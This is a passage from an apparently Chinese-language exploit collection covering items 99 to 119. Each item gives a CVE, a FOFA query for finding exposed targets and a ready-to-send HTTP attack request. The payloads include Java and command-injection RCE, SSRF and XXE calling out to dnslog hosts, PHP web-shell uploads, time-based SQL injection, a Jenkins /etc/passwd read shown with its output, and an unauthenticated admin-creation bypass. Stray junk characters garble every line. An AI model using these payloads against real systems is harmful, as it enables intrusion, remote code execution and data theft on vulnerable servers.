id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
s: n; \2 ^7 h- U! \4 p, ~ M0 |5 G" Q/ E
% y+ B% |$ L, A) K3 Q
99. Ncast盈可视高清智能录播系统busiFacade RCE
7 n6 Z# w- ?8 H; P* t. o7 Z1 }CVE-2024-0305. m" O9 n: \5 o: @8 i' |: {' }+ ]
FOFA:app="Ncast-产品" && title=="高清智能录播系统", L% ~7 I- K* r: N+ N4 x
POST /classes/common/busiFacade.php HTTP/1.1
% o9 E- @9 v4 ~Host: 192.168.40.130:80806 |9 T; x% ^3 T4 g9 e1 e* h6 X$ O; Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ l* W0 }' H% o3 fConnection: close
4 P9 L3 f' S- a- j' ^/ r; VContent-Length: 154
2 }- k5 @6 s+ {! H1 O$ H. ^$ aAccept: */*
. e* u6 C/ h/ g7 }Accept-Encoding: gzip, deflate; O, r$ e7 x& V3 W4 `; w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# D+ N! z4 a6 Z. m1 |% z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
6 J: i& O" |5 [+ ^! J: eX-Requested-With: XMLHttpRequest8 Z I% ?' R+ @: j
6 F$ p& m: R1 w% u' t$ L
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
+ Z/ X7 V4 s! }1 d' d6 @" E* c8 h2 {5 N
7 }+ C0 \' |6 M7 @100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
' Q+ P( M5 P8 {7 m. n$ ACVE-2024-0352
w7 \0 e9 l# C |& KFOFA:icon_hash="874152924" U" q4 W" M% t/ y& A9 {
POST /api/file/formimage HTTP/1.12 D: t& w U& S& F& c
Host: 192.168.40.130
% E3 e" x+ U, I' z. ]6 AUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36% S: W, a4 h# r' C9 c. ]' y
Connection: close: H6 ?( \7 e# q% F! a$ U
Content-Length: 201
: j# R2 p2 X3 W, R+ pContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei8 U+ g1 A2 f6 e' j+ P+ L% p
Accept-Encoding: gzip
2 y/ s L5 F0 M; G! A, ^- ~4 x1 {1 }% i' ?
------WebKitFormBoundarygcflwtei
: i0 m3 f0 M% V; u @/ bContent-Disposition: form-data; name="file";filename="IE4MGP.php"8 x3 D% F8 a# t9 `3 I9 @- d
Content-Type: application/x-php, {% d) h5 Y8 p" u
' t: W) K$ ^0 ^ V J- O
2ayyhRXiAsKXL8olvF5s4qqyI2O) o: n* W! j& {+ z5 C2 @2 l) K
------WebKitFormBoundarygcflwtei--# ?! ?8 y9 G5 k2 j& N$ J
! T7 C% r) I! f
7 B6 g# Y& P& Z. o4 I101. ivanti policy secure-22.6命令注入+ k; q8 q8 U6 o: C
CVE-2024-21887
; n4 W# t& O! }: S+ ^4 DFOFA:body="welcome.cgi?p=logo"
3 w1 `- G. o5 z1 X) `2 ]; xGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1( T" d% S4 l4 m' U5 z# |
Host: x.x.x.xx.x.x.x
! p8 f* r7 ?7 \& g* yUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% i* V6 E8 M. ~" D: FConnection: close
7 B/ l z1 f, ]& E- OAccept-Encoding: gzip
$ \# z" }- C h0 K% ?/ K% k& g9 B# `0 b0 P
* v! x5 K! I: M, y/ k. F% R7 D9 ~
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
5 V+ X9 o) [$ A5 OCVE-2024-21893
2 b1 u" f L0 hFOFA:body="welcome.cgi?p=logo"* b4 w( ~& ^: ]! U9 w- z
POST /dana-ws/saml20.ws HTTP/1.1
( Q0 O% T1 W3 c7 E* s: QHost: x.x.x.x" e/ {" C X2 z$ l8 ?( Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 [' _( `& L+ f1 ?3 M0 s$ o
Connection: close' Z4 N1 k- n4 V+ f
Content-Length: 792
& z) Y2 E# \3 [Accept-Encoding: gzip$ D' e( g* {# h# `
" N! G# @* p& u: W5 `<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
. k5 `6 q, J. n) n/ u% ] t/ W- \9 G
4 W2 f/ W$ z3 d7 a t: y5 r103. Ivanti Pulse Connect Secure VPN XXE. K4 E9 I3 [9 y4 x- |
CVE-2024-22024
, \ {/ d$ n& j0 |8 {) KFOFA:body="welcome.cgi?p=logo"# m- ^+ p8 b3 f( j+ ^3 U+ C2 N' B
POST /dana-na/auth/saml-sso.cgi HTTP/1.1, f( J# m* x0 K. y4 b
Host: 192.168.40.130:111
" n( x8 J0 d0 t- V2 l' pUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.367 d6 a' `) h& E4 m8 C1 m7 L- f
Connection: close0 w/ @6 D$ x+ r0 r
Content-Length: 204
4 \5 f" ], l# T1 R" z9 jContent-Type: application/x-www-form-urlencoded0 Z& W, @0 e& `) q) @
Accept-Encoding: gzip
- F( G" r, M" h4 \8 S% s M: y5 D, `- _6 D* W- F8 N! \$ p
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==9 e" H7 w. p4 W4 n$ V5 l
4 i9 k/ m: {) B. f/ C& c
. u' a( v' k! J# I& ]其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
W, O/ O3 ~$ w: o<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
/ V- ~. E7 m- U% p0 Z7 s/ }9 S ?& K2 i: b) \( t
/ H5 C2 I w4 a- i8 q1 l
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露; v' Y; r$ R4 v ~4 S
CVE-2024-0569 e4 U: F+ P' N
FOFA:title="TOTOLINK"/ [ ~# v' `* x* H6 O! v9 D& `
POST /cgi-bin/cstecgi.cgi HTTP/1.1
) e8 O8 y5 ?" `7 [Host:192.168.0.1% u2 p6 r& y3 x" @0 J1 @$ R
Content-Length:41
. v+ z4 J9 O* j0 V1 BAccept:application/json,text/javascript,*/*;q=0.017 ]1 L: s( o6 L, q
X-Requested-with: XMLHttpRequest& r* o7 M: n' y; E, Z+ F+ a4 w
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.361 T: u6 n$ |4 |$ E$ s
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
; y% L0 V/ ^ g+ m: a8 NOrigin: http://192.168.0.1' d/ b* h; @" d. G& L- ^
Referer: http://192.168.0.1/advance/index.html?time=1671152380564* x' |; z3 }/ ^: C
Accept-Encoding:gzip,deflate
) z& T' j5 J. {0 S" l) kAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.74 _+ o$ i V C" j
Connection:close$ n# T6 j% U3 X1 Z5 t7 @
' Y. c/ P1 Q) s$ o! G
{4 _4 d7 V* k4 V$ x6 g
"topicurl":"getSysStatusCfg",. J( G ?( Q# @5 b2 E
"token":""
7 g$ g: E ~" u. m/ U}
% O! M) m% L% X8 n5 u& r: B* V* Y" [% k# {
105. SpringBlade v3.2.0 export-user SQL 注入 L! L( B6 ?5 X3 Y, [/ _* H
FOFA:body="https://bladex.vip"
' m, J9 x8 x6 [! B& Fhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1' S+ f$ b# i/ |% u
9 N$ t3 p) n8 O, u2 E7 k
106. SpringBlade dict-biz/list SQL 注入2 g7 A: v' O( b3 o9 H
FOFA:body="Saber 将不能正常工作"# b; x% W- F4 Y) P# j5 E
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
' E- x) Q1 B% q/ E) U3 xHost: your-ip
% y# R# m% L9 e8 d2 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 J9 h/ J# Z" Z
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A1 o G2 B$ ?/ L. R
Accept-Encoding: gzip, deflate
2 C3 t% Q4 L$ ]Accept-Language: zh-CN,zh;q=0.9& I3 ]" s4 j1 ~$ ]8 u' s3 C
Connection: close
- R9 H* G( _: B
0 P: c+ f! A4 W- z, [6 G. K3 p9 F* l( W: A! }( m
107. SpringBlade tenant/list SQL 注入3 l; d3 G% F M+ l, l4 ~$ r9 d% ^8 y
FOFA:body="https://bladex.vip"
. [6 Y7 t: F- b& a* I9 B; [GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
* ^' e+ j1 `* x' a |/ C! mHost: your-ip
% m! U8 E2 Z: c* jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; D) M; ]1 e1 r. ]' \
Blade-Auth:替换为自己的8 R8 R# F. }1 W4 z/ I, G# q+ O
Connection: close
G5 A6 i$ C/ z
" q! a8 K5 M! `* W( y0 @! k9 a- G" Q+ p$ {( ^0 j0 A
108. D-Tale 3.9.0 SSRF5 |' a, }* h( m3 p) o; x4 v; Z. i7 d
CVE-2024-21642
' b4 C5 _+ F% O3 O" \$ ]FOFA:"dtale/static/images/favicon.png"
5 k/ B j: v( q4 i' q9 w# }GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
, x! P; }; I( D6 }& ~Host: your-ip
8 V5 K6 `0 a: S9 n. H; Y- GAccept: application/json, text/plain, */*
6 d# g1 u1 j1 s% ~* f) w W. zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( J3 \- h( g3 Q; h/ C) fAccept-Encoding: gzip, deflate
, i4 e5 n' e: G* n+ ?Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 ~9 [2 O" {- v! n; mConnection: close9 d: N8 R6 w3 \2 r. N! U# v+ ~
, I0 K+ P4 @# Q/ x1 J* o5 w! F
) Q7 _* }1 x c6 Z/ G3 c! }
109. Jenkins CLI 任意文件读取' c" N, p$ u0 A. b! A0 N( G
CVE-2024-23897
7 _! i/ v3 F5 m# i1 f1 bFOFA:header="X-Jenkins"" u1 c7 V3 e) }
POST /cli?remoting=false HTTP/1.1* M6 q9 m* e* j8 ^9 Q1 P
Host:
6 F( a7 m" s0 i1 X3 g0 {Content-type: application/octet-stream
5 Z! m0 l& @* P; E. ^, q3 {; C: p6 iSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ S k) c8 Z" S
Side: upload5 e/ s7 G3 ^6 Q6 ^* ~0 ^
Connection: keep-alive
; q7 v& r! Z3 x+ ]Content-Length: 163" D- a. o, A' X; L9 L8 v# K9 n6 R
$ T4 i# S0 r0 H5 k- z3 @b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! r5 U: ~1 e4 Q [
. e0 ]. A, _5 R9 J) i) ?7 u/ L# g
8 w4 V$ r8 P; p6 ]2 |
POST /cli?remoting=false HTTP/1.1. X6 J- }* w/ q$ W9 ?: R/ I' ^1 s
Host:
. X t" U, V5 w: S+ x, o8 E7 eSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92+ \3 S c$ A, T) E4 l7 E
download
* l- O3 h# |' s! s- MContent-Type: application/x-www-form-urlencoded
" z. Q$ A. I. @* ?Content-Length: 0
) j ~0 |* ?% q$ F: _" I5 H1 @9 | @% x
8 U8 j' g+ L1 J! y* }& ], Y9 N; D, @. z$ R% V, z0 `
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin+ s! {) a% x3 n( ^+ Q
java -jar jenkins-cli.jar help
0 v% {: l {! n* D9 }2 i5 J[COMMAND]2 r* o( O. x) I# F% S# Q
Lists all the available commands or a detailed description of single command.
. v" K- i) f7 w& z! \; a COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
' l. c K$ l, G5 b# ]# P' G" ?4 x. t6 V+ U" y+ O
: A7 s9 X+ r7 Q9 E+ ]7 A
110. Goanywhere MFT 未授权创建管理员8 l9 b, w5 H m) O8 q5 g
CVE-2024-0204
- p3 g) ~* F7 J) a3 G( ?8 [FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"& X2 ?. A/ m, d/ n: B: z! X
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
% o% b5 v% h) ], P* `Host: 192.168.40.130:8000& L7 E2 _4 z8 p
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
+ x, |7 r# `' M& oConnection: close2 Z( p% R( _& {0 z' L, h
Accept: */*3 f) {% b! }$ |; B
Accept-Language: en
& l2 Z5 Q4 C1 M- q2 v* ZAccept-Encoding: gzip0 k8 ]' x( v% n5 h% _0 S
6 @% M, R' o/ i) C3 |2 M; j
6 T' Y1 v) J2 U# D% \' h! w111. WordPress Plugin HTML5 Video Player SQL注入
* |2 ~% ~. {. W1 [, O/ ECVE-2024-1061
) [1 a/ \6 B5 X" T! Z+ pFOFA:"wordpress" && body="html5-video-player"5 C/ y- Y* _! R; Y
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
: S3 O, \* V+ Q' S* [2 OHost: 192.168.40.130:112/ O/ N- X# l' v$ {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ X, \" h z3 T0 u6 KConnection: close: Z% ^% b+ l$ Y$ O0 N# v- D6 P
Accept: */*3 O8 P. ]; O8 ?" N0 w( v
Accept-Language: en) J, I+ C0 G: L4 K. I
Accept-Encoding: gzip
2 N0 \2 n" U' j: t3 {; T% ?" y5 o+ N `/ M
# n9 Z4 X t9 ^: V* [0 c112. WordPress Plugin NotificationX SQL 注入
7 u T% e% y9 D" |CVE-2024-16989 ~$ z9 K3 A! @/ S* @, [' a
FOFA:body="/wp-content/plugins/notificationx"
* x; ]3 C- J$ o- HPOST /wp-json/notificationx/v1/analytics HTTP/1.1, u8 c2 p, W0 x2 p% P
Host: {{Hostname}}
: p3 n) Q% R$ I9 f& {2 c3 q/ d( p0 zContent-Type: application/json
8 D: m! [8 g4 y& N) T% k' @; I; J* p8 P
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
q; [ Q& V. Y& U& I" i6 Y3 o* z0 l$ R3 ]5 ?
: g, p& t" T- ?1 F113. WordPress Automatic 插件任意文件下载和SSRF
1 @/ F' Q' m r3 T* fCVE-2024-27954
5 l2 o5 C5 ~9 ^) _1 `6 e! F" U9 G# `FOFA:"/wp-content/plugins/wp-automatic"
% @3 I0 Z- {# l2 t6 U' xGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1+ r$ G( T' P/ S) m' }
Host: x.x.x.x: T5 K1 j; C" @, ?: z9 m
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
: M4 U. ]% K- H4 @4 g, s: O! eConnection: close" p7 Z6 W: F8 e% ^1 J) M# N$ [$ `, b
Accept: */*
7 \' O) u+ Q1 p8 d# K! b) O7 `Accept-Language: en* f% W) i2 m: {
Accept-Encoding: gzip. s7 m! R" I0 R- [
- W' e4 W, d7 d5 b9 {( \. d+ Z
6 {& w6 q4 O4 t) Q114. WordPress MasterStudy LMS插件 SQL注入
" v# A$ I+ j( o. UFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
4 [! A+ C' M1 N9 J7 j$ DGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1- P- _$ l0 ^# }: k" ]- o
Host: your-ip
; R, O- B9 V! T. WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
: |/ u4 L1 S+ YAccept-Charset: utf-8
4 i; x+ ~; c7 m- ]# yAccept-Encoding: gzip, deflate" i* V' H" ~, J
Connection: close
9 `( f$ @# N& }* M4 c
* p5 s* H% {4 n3 g7 l1 _* r" Y- L
U' G5 k: C' k& C+ V1 R) y- t% H115. WordPress Bricks Builder <= 1.9.6 RCE
9 b+ H0 ^* [5 w3 ZCVE-2024-25600
2 H$ }( T2 Y* W- D/ Y# ~# oFOFA: body="/wp-content/themes/bricks/"
9 L) C2 i2 i, K* ~7 k9 v0 T K第一步,获取网站的nonce值! u8 e) L3 X9 E" s) K) e$ z
GET / HTTP/1.16 l7 Y- ^8 X- T5 w2 ]
Host: x.x.x.x% g' R8 d7 l# J* J* G1 n( U' k
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
- g5 f& s4 D( u y, a2 wConnection: close
{, v* C* J$ O/ g3 P% H0 kAccept-Encoding: gzip; G+ ~5 I( P+ f* R& S" d
9 f' _5 ]3 V `4 X, P; }2 s3 s/ W2 x
第二步替换nonce值,执行命令
, q& O+ m9 ~% }3 ePOST /wp-json/bricks/v1/render_element HTTP/1.1
! L$ r3 E2 ]. Q- ^Host: x.x.x.x
5 l. g6 g6 d& B$ W* `5 r2 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 b5 j5 p' Y; ] G0 w
Connection: close- m9 J7 I t4 ~( ]% x5 M5 b7 E
Content-Length: 3567 @/ ~& m' B2 Q0 s& H% I5 ]
Content-Type: application/json( r2 o% \! n' Z( K, @1 `
Accept-Encoding: gzip# |2 _4 [0 X" I
3 U2 n7 E8 G1 l8 W) a1 R
{
6 B( `4 V7 m3 l4 f0 z"postId": "1",
t. {/ t, T6 P$ e5 x "nonce": "第一步获得的值",
( W* }* t" J( a0 `. f7 j "element": {% S7 M( s Y5 _0 [: z0 D* z
"name": "container",9 b- }5 y: g; Y; ^$ d5 \! Q9 p
"settings": {
) l$ j% j7 _* q; u7 d "hasLoop": "true",
) S8 c/ U+ e9 f- M: |5 A$ a+ @ "query": {
1 v- G* a1 v, g& \. }0 o1 [; F "useQueryEditor": true,& H( S1 m x" u$ |
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",5 H9 a1 r' L# c& _2 s. A; M& H8 Z9 M. C
"objectType": "post"* [/ E: P; j8 b% L4 B* o- L
}" |$ k/ Q9 W7 \+ }6 ~( G1 N
}+ a* L5 Z: G U8 c6 w
}0 [+ l0 K* i$ _
}" \0 S! W0 B, h8 d# c- W
# X7 k7 O; n# \' e+ p. l' Y/ W7 G
8 e' ~" n; E4 W! f# c0 y116. wordpress js-support-ticket文件上传9 a( ?3 k0 Z$ X
FOFA:body="wp-content/plugins/js-support-ticket"
9 w! i; m2 N$ o# m8 n5 x; h) RPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
+ ?6 D3 v& S2 J% p. ? n$ q. U( @8 gHost:
- X! r) b" d7 l7 t$ `: `% t4 wContent-Type: multipart/form-data; boundary=--------767099171" ]) v+ v; ?' U! o
User-Agent: Mozilla/5.0/ I" X0 U o5 o( Z& |- c" Z
& F. g' z0 n- n, }" \
----------767099171
1 A' b: P1 U+ _: n) mContent-Disposition: form-data; name="action"
7 s5 q; o$ j V% m8 Z+ ?configuration_saveconfiguration
1 z% T& }. V4 R* }4 {' J# M; H----------767099171
2 P! v% T3 S# C: {Content-Disposition: form-data; name="form_request"
" J* @$ f9 a5 Jjssupportticket) p Z, W6 y4 S$ B) v
----------767099171
! l% l2 A, X5 d- U- E0 H3 wContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
7 P4 w1 j" ^2 @. I( `# _Content-Type: image/png; M6 R5 [0 H( S/ i0 k
----------767099171--
! }8 }; ]6 A" ]3 v. w, ]# \5 S; W& d( B. d/ q+ y; t8 m
( X9 x% X2 p6 U1 R% D/ ]
117. WordPress LayerSlider插件SQL注入# r& q2 ~0 z4 S5 m' A
version:7.9.11 – 7.10.0
' v9 v, _2 h$ Z5 g4 L+ UFOFA:body="/wp-content/plugins/LayerSlider/"5 Y# I5 @6 H+ [' j/ P
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1: [' i0 r# l4 }3 K7 \- C6 I
Host: your-ip; U( [. M0 }% |% [" j! f+ O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! a1 p% T- v- Q% O( Z( LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% f5 w) {9 B9 f( X6 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) x" k* ], F& w$ K; ~6 @Accept-Encoding: gzip, deflate, br
+ n' u, i# j- W1 i* w: M' k ^Connection: close
6 p0 |0 s. D4 Y; R& p" o cUpgrade-Insecure-Requests: 1
1 O% |1 J' J6 D5 }. y$ x! p& K% J j5 Y
% ~6 |! J! C4 R! v$ T118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ L( U; W( E, J9 H' VCVE-2024-0939$ c, z' }& r. v* I& i% J, W- U
FOFA:title="Smart管理平台"
4 D5 ?* M# ^) APOST /Tool/uploadfile.php? HTTP/1.1
' I1 l p1 h( s1 n8 iHost: 192.168.40.130:8443
^+ d: T2 @+ R0 u9 U' s4 ACookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
% g4 J! R1 v1 o5 z2 y9 i$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' R- w; m/ o) R5 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! {6 H- v( V9 v5 k9 v9 c. k; V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 m$ N0 U) p& ?; x4 b* s) o' _
Accept-Encoding: gzip, deflate n# G/ [6 [# E2 L
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887% ^- R) b) W& f1 J4 M
Content-Length: 4054 U$ {# y- a; }9 q
Origin: https://192.168.40.130:8443, T/ v, C/ t1 h; r2 ?! e$ z
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
( @" q! D6 k: X2 o/ Y+ R# X2 vUpgrade-Insecure-Requests: 1
" U6 \/ f$ ]+ E1 p! m& gSec-Fetch-Dest: document& v, `9 y) {7 H# |$ r
Sec-Fetch-Mode: navigate5 t+ V; m% l M! {, l) Q, J% ?1 y3 ~
Sec-Fetch-Site: same-origin
9 N/ l/ \9 n- c2 t, d" p4 USec-Fetch-User: ?10 j+ z" d( J- t7 w
Te: trailers, N u+ Y5 B% E: v# d- \2 [
Connection: close
% V1 P/ r2 b4 E: ]: g8 C) `3 B8 l1 `3 |9 Q3 k. t2 I3 V
-----------------------------13979701222747646634037182887
5 H- f- D. S/ Q; I1 zContent-Disposition: form-data; name="file_upload"; filename="contents.php"9 \* }0 L6 Y2 Q$ A
Content-Type: application/octet-stream# u2 ]" r. X! i; \2 d' i
8 A5 A6 V) A& c/ @# k<?php
2 r+ v. `' D ]5 |( I% q" Ksystem($_POST["passwd"]);6 l% ?' Q# p8 c, T# Y3 U
?>
$ t2 U6 ^) I+ k6 S: N-----------------------------13979701222747646634037182887
( G% E) [5 Q* e! Q3 |5 n7 ]Content-Disposition: form-data; name="txt_path"& M) O( y6 b- i- a6 a+ P1 p; o
3 j5 P/ ^& Z. K' g* S! `4 [5 P
/home/src.php
7 z4 c: f% p5 v3 i9 C" D-----------------------------13979701222747646634037182887--
- H- m6 x8 O& n' ~
& i7 O# Y, e0 W: W/ ~) W8 s# t% R% _* ~) I
访问/home/src.php
6 `% E( P- A3 k2 k% l* Y4 h% |7 i0 l) [# q# c% t6 m, @' l1 k
119. 北京百绰智能S20后台sysmanageajax.php sql注入
+ x3 B; w$ Y: ]1 UCVE-2024-1254
4 J! r( e+ ]) Z5 M& W. m- lFOFA:title="Smart管理平台"0 a* w) g; f7 j$ y* I2 y# v
先登录进入系统,默认账号密码为admin/admin7 v- d- @, y- a$ y' ]( h1 K6 U
POST /sysmanage/sysmanageajax.php HTTP/1.11
0 d. }4 n1 f9 x7 [) u' H( WHost: x.x.x.x& y! p9 X9 ? C1 R+ V) A4 h& n
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee$ `5 Z& ]5 j# q! @! p6 j# V3 y* n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0- Y! Q. L m1 v
Accept: */*3 G! y1 {7 a5 |6 Q; |, T9 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 K; a( ^6 u3 v/ ]" x! WAccept-Encoding: gzip, deflate
0 m2 T" K/ n( fContent-Type: application/x-www-form-urlencoded;! q* |6 i* H$ _9 G
Content-Length: 109
) G( x& l2 n/ ~Origin: https://58.18.133.60:8443
3 m! v& A$ H l9 X t, B4 ?Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
6 j( i1 m: X) |. dSec-Fetch-Dest: empty" |( G) i9 ^% p* W/ \: n! l
Sec-Fetch-Mode: cors: Z7 A5 O" d) ?2 I% }
Sec-Fetch-Site: same-origin6 y2 G; ^! o8 T
X-Forwarded-For: 1.1.1.10 j1 Y) `: Y/ M) F5 r& T7 C
X-Originating-Ip: 1.1.1.14 I4 Z- l( R8 f% s; h
X-Remote-Ip: 1.1.1.1* d3 N! ^1 ^) P( Y, {+ ]
X-Remote-Addr: 1.1.1.1# ^' }3 C( A! E: N5 ~, r4 a
Te: trailers! z8 g/ e& R) J6 ~* k: v/ q
Connection: close$ k4 }/ M/ ?& U1 y: V
